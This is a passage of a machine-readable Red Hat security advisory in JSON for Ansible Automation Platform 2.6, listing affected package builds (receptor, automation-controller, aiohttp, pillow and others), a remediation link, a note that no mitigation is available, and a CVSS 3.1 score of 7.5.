"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
